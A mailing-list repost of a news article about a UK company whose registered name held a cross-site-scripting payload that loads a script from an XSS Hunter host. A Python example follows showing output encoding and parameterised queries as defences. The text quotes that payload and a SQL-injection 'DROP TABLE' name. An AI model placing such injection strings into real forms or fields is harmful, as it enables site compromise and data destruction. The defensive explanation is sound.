https://www.theguardian.com/uk-news/2020/nov/06/companies-house-forces-business-name-change-to-prevent-security-risk
Companies House has forced a company to change its name after it belatedly realised it could pose a security risk.

The company now legally known as “THAT COMPANY WHOSE NAME USED TO CONTAIN HTML SCRIPT TAGS LTD” was set up by a British software engineer, who says he did it purely because he thought it would be “a fun playful name” for his consulting business.

He now says he didn’t realise that Companies House was actually vulnerable to the extremely simple technique he used, known as “cross-site scripting”, which allows an attacker to run code from one website on another.

The original name of the company was “"><SCRIPT SRC=HTTPS://MJT.XSS.HT> LTD”. By beginning the name with a quotation mark and chevron, any site which failed to properly handle the HTML code would have mistakenly thought the company name was blank, and then loaded and executed a script from the site XSS Hunter, which helps developers find cross-site scripting errors.

That script would have simply put up a harmless alert – but it serves as proof that a malicious attacker could instead have used the same weakness as a gateway to more damaging ends.

Similar names have been registered in the past, such as “; DROP TABLE "COMPANIES";-- LTD”, a wry attempt <https://pizzey.me/blog/no-i-didnt-try-to-break-companies-house/> to carry out an attack known as SQL injection, inspired by a famous XKCD webcomic <https://xkcd.com/327/>, but this was the first such name to have prompted a response.

Companies House has retroactively removed the original name from its data feeds, and all documentation referring to its original moniker now reads simply “Company name available on request”.
--
Kim Holburn
IT Network & Security Consultant
T: +61 2 61402408 M: +61 404072753
mailto:[email protected] aim://kimholburn
skype://kholburn - PGP Public Key on request
_______________________________________________
Link mailing list
[email protected]
http://mailman.anu.edu.au/mailman/listinfo/link
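The two registered names quoted in the article are a compact illustration of the two defences a site rendering and storing them needs: output encoding for the HTML context, and parameterised queries for the database. The following is an added example, not code from the article or from Companies House; it assumes a hypothetical form template with the name in a `value` attribute and a hypothetical `companies(name)` table in SQLite, and uses Python's `HTMLParser` to show which scripts a browser would be told to load in each case.

```python
import html
import sqlite3
from html.parser import HTMLParser

# The two company names quoted in the article above, used here as test input.
XSS_NAME = '"><SCRIPT SRC=HTTPS://MJT.XSS.HT> LTD'
SQLI_NAME = '; DROP TABLE "COMPANIES";-- LTD'

def render_unsafe(name: str) -> str:
    """Naive template: the name is pasted into an attribute value as-is."""
    return f'<input type="text" value="{name}">'

def render_safe(name: str) -> str:
    """Same template with HTML attribute encoding applied to the name."""
    return f'<input type="text" value="{html.escape(name, quote=True)}">'

class ScriptFinder(HTMLParser):
    """Collects the src of every <script> tag, i.e. what a browser would fetch."""
    def __init__(self) -> None:
        super().__init__()
        self.script_srcs: list = []

    def handle_starttag(self, tag, attrs) -> None:
        if tag == "script":  # HTMLParser lower-cases tag and attribute names
            self.script_srcs.append(dict(attrs).get("src"))

def scripts_in(markup: str) -> list:
    finder = ScriptFinder()
    finder.feed(markup)
    return finder.script_srcs

def insert_company(conn: sqlite3.Connection, name: str) -> int:
    """Parameterised insert: the name travels as a bound value, never as SQL text."""
    conn.execute("INSERT INTO companies(name) VALUES (?)", (name,))
    return conn.execute("SELECT COUNT(*) FROM companies").fetchone()[0]

def demo() -> dict:
    conn = sqlite3.connect(":memory:")  # hypothetical register table
    conn.execute("CREATE TABLE companies(name TEXT)")
    return {
        "unsafe_scripts": scripts_in(render_unsafe(XSS_NAME)),  # ['HTTPS://MJT.XSS.HT']
        "safe_scripts": scripts_in(render_safe(XSS_NAME)),      # []
        "rows": insert_company(conn, SQLI_NAME),                 # 1, table intact
        "stored_name": conn.execute("SELECT name FROM companies").fetchone()[0],
    }
```

The unsafe rendering closes the attribute and the tag exactly as the article describes, so the parser sees a script element pointing at the XSS Hunter host; the encoded rendering keeps the whole name inside the attribute, and the bound parameter stores the SQL-looking name as an ordinary string.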